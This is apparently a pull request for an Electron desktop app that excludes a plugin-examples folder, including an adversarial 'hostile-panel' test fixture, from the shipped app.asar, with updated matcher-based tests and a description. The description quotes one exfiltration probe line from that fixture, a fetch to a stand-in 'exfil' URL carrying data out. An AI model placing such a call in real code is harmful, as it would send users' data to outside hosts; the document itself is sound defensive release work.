### PR TITLE
fix(release): stop packaging plugin authoring examples into app.asar

### DIFF
--- a/config/electron-builder.config.cjs
+++ b/config/electron-builder.config.cjs
@@ -83,12 +83,17 @@ module.exports = {
     '!skill-guides{,/**/*}',
     '!skill-stubs{,/**/*}',
     '!tests{,/**/*}',
+    // Why: examples/ is plugin authoring documentation with no runtime consumer —
+    // bundled plugins ship via extraResources from resources/plugins/launch/. It also
+    // carries hostile-panel, the adversarial fixture the containment tests point at,
+    // which must never reach a user's install.
+    '!examples{,/**/*}',
     // Why: pr-evidence/ is a local e2e screenshot output (ORCA_CAPTURE_EVIDENCE);
     // it is gitignored, but exclude it defensively so a stray local capture at
     // package time never bloats app.asar.
     '!pr-evidence{,/**/*}',
     '!Casks{,/**/*}',
-    '!{AGENTS.md,CLAUDE.md,DEVELOPING.md,bundle-size-progress.md}',
+    '!{AGENTS.md,CLAUDE.md,DEVELOPING.md,bundle-size-progress.md,ORCHESTRATION_IMPLEMENTATION_CHECKLIST.md,ORCHESTRATION_STRUCTURED_OUTPUT_DESIGN.md}',
     '!out/**/*.test.js',
     // Why: Vite's manifest is only used to project the paired web client.
     '!out/renderer/.vite{,/**/*}',

--- a/config/scripts/electron-builder-config.test.mjs
+++ b/config/scripts/electron-builder-config.test.mjs
@@ -6,6 +6,7 @@ import { describe, expect, it } from 'vitest'
 
 const require = createRequire(import.meta.url)
 const electronBuilderConfig = require('../electron-builder.config.cjs')
+const { FileMatcher } = require('app-builder-lib/out/fileMatcher')
 const electronBuilderNativeRebuild = require('./electron-builder-native-rebuild.cjs')
 const {
   createPackagedRuntimeNodeModuleResources,
@@ -48,23 +49,27 @@ describe('electron-builder config', () => {
     )
   })
 
-  // Why: `files` is an all-negation list, so electron-builder's default `**/*`
-  // packs anything without an explicit `!` entry. examples/ landed without one
-  // and shipped hostile-panel — the adversarial fixture the panel containment
-  // tests point at — into 1.4.160-rc.3's app.asar. Assert the exclusion by the
-  // repo paths that must never ship, so adding a new example cannot re-break it.
+  // Why: `files` is an all-negation list, so electron-builder's default `**/*` packs
+  // anything without an explicit `!` entry — examples/ landed without one and shipped
+  // hostile-panel, the adversarial containment fixture, into 1.4.160-rc.3's app.asar.
+  // Drive the real matcher: pinning the pattern string cannot prove it excludes the tree.
   it('keeps plugin authoring examples out of app.asar', () => {
-    const negatedDirs = new Set(
-      electronBuilderConfig.files
-        .filter((pattern) => pattern.startsWith('!'))
-        .map((pattern) => pattern.slice(1).replace(/\{.*$/, '').replace(/\/.*$/, ''))
-    )
-    for (const shippedOnlyForAuthoring of [
+    const matcher = new FileMatcher('/app', '/dest', (value) => value, electronBuilderConfig.files)
+    // copyFiles() prepends this itself once the pattern list is all-negation.
+    matcher.prependPattern('**/*')
+    const isPacked = matcher.createFilter()
+    const packs = (repoPath) => isPacked(join('/app', repoPath), { isDirectory: () => false })
+
+    for (const authoringOnly of [
       'examples/plugins/hostile-panel/panel.html',
-      'examples/plugins/hello-orca/main.mjs'
+      'examples/plugins/hostile-panel/orca-plugin.json',
+      'examples/plugins/hello-orca/main.mjs',
+      'examples/plugins/hello-orca/orca-plugin.json'
     ]) {
-      expect(negatedDirs).toContain(shippedOnlyForAuthoring.split('/')[0])
+      expect(packs(authoringOnly)).toBe(false)
     }
+    // The negation stays anchored at the app root, so nested `examples` segments still ship.
+    expect(packs('out/main/examples/index.js')).toBe(true)
   })
 
   it('keeps runtime resources available through extraResources', () => {

--- a/config/scripts/electron-builder-config.test.mjs
+++ b/config/scripts/electron-builder-config.test.mjs
@@ -38,13 +38,33 @@ describe('electron-builder config', () => {
         '!skill-stubs{,/**/*}',
         '!resources/skills/**',
         '!tests{,/**/*}',
+        '!examples{,/**/*}',
         '!pr-evidence{,/**/*}',
         '!Casks{,/**/*}',
-        '!{AGENTS.md,CLAUDE.md,DEVELOPING.md,bundle-size-progress.md}',
+        '!{AGENTS.md,CLAUDE.md,DEVELOPING.md,bundle-size-progress.md,ORCHESTRATION_IMPLEMENTATION_CHECKLIST.md,ORCHESTRATION_STRUCTURED_OUTPUT_DESIGN.md}',
         '!out/**/*.test.js',
         '!resources/plugins/launch/**'
       ])
     )
+  })
+
+  // Why: `files` is an all-negation list, so electron-builder's default `**/*`
+  // packs anything without an explicit `!` entry. examples/ landed without one
+  // and shipped hostile-panel — the adversarial fixture the panel containment
+  // tests point at — into 1.4.160-rc.3's app.asar. Assert the exclusion by the
+  // repo paths that must never ship, so adding a new example cannot re-break it.
+  it('keeps plugin authoring examples out of app.asar', () => {
+    const negatedDirs = new Set(
+      electronBuilderConfig.files
+        .filter((pattern) => pattern.startsWith('!'))
+        .map((pattern) => pattern.slice(1).replace(/\{.*$/, '').replace(/\/.*$/, ''))
+    )
+    for (const shippedOnlyForAuthoring of [
+      'examples/plugins/hostile-panel/panel.html',
+      'examples/plugins/hello-orca/main.mjs'
+    ]) {
+      expect(negatedDirs).toContain(shippedOnlyForAuthoring.split('/')[0])
+    }
   })
 
   it('keeps runtime resources available through extraResources', () => {


### PR DESCRIPTION
## What

`config/electron-builder.config.cjs`'s `files` array is an **all-negation** list, so electron-builder's default `**/*` applies and anything without an explicit `!` entry gets packed. `examples/` arrived with the plugin system (#8549) and never got one.

Result: **v1.4.160-rc.3 ships the adversarial plugin fixture to every user.**

## Proof (against the installed rc.3 artifact, not just the config)

Parsing the shipped `app.asar` header from `/Applications/Orca.app` at `1.4.160-rc.3`:

```
examples/plugins/hello-orca/main.mjs          1059
examples/plugins/hello-orca/orca-plugin.json   766
examples/plugins/hello-orca/panel.html        4306
examples/plugins/hostile-panel/orca-plugin.json 529
examples/plugins/hostile-panel/panel.html     7400
```

`hostile-panel` is the deliberately hostile fixture the panel containment tests point at — its `panel.html` carries a `fetch('https://example.com/exfil?d=' + …)` probe and its own manifest says *"Deliberately hostile panel … Never grant it anything."* It has no business inside a user's install.

`examples/` did not exist at `v1.4.159` (0 files), so this is new in the `v1.4.159..v1.4.160-rc.3` span.

The same asar listing showed the two orchestration design docs added at the repo root in this span (`ORCHESTRATION_IMPLEMENTATION_CHECKLIST.md`, `ORCHESTRATION_STRUCTURED_OUTPUT_DESIGN.md`) shipping too; they fold into the existing root-doc negation.

## Why this is safe

No runtime consumer. Bundled plugins ship via `extraResources` from `resources/plugins/launch/`, which the config already excludes from the asar for precisely this reason. `git grep` finds no runtime reference to the `examples/` tree.

## Tests

Updated the existing `excludes repo-only source trees from app.asar` case and added `keeps plugin authoring examples out of app.asar`, asserted via the repo paths that must never ship so adding a new example cannot silently re-break it.

Mutation-checked — removing `'!examples{,/**/*}'` from the config fails **both** cases:

```
× excludes repo-only source trees from app.asar
× keeps plugin authoring examples out of app.asar
  AssertionError: expected [ Array(17) ] to include 'examples'
Tests  2 failed | 24 passed (26)
```

With the fix in place: `26 passed (26)`.

## Not addressed (pre-existing, deliberately out of scope)

The same asar listing shows `tools/`, `build-plugins/`, `vite.web.config.ts`, `components.json`, `.oxlintrc.json`, and `.oxfmtrc.json` also packed. Those predate this span and are bloat rather than a shipped-hostile-fixture problem, so they belong in a separate change.

Found by a release-readiness scan of `v1.4.159..v1.4.160-rc.3`.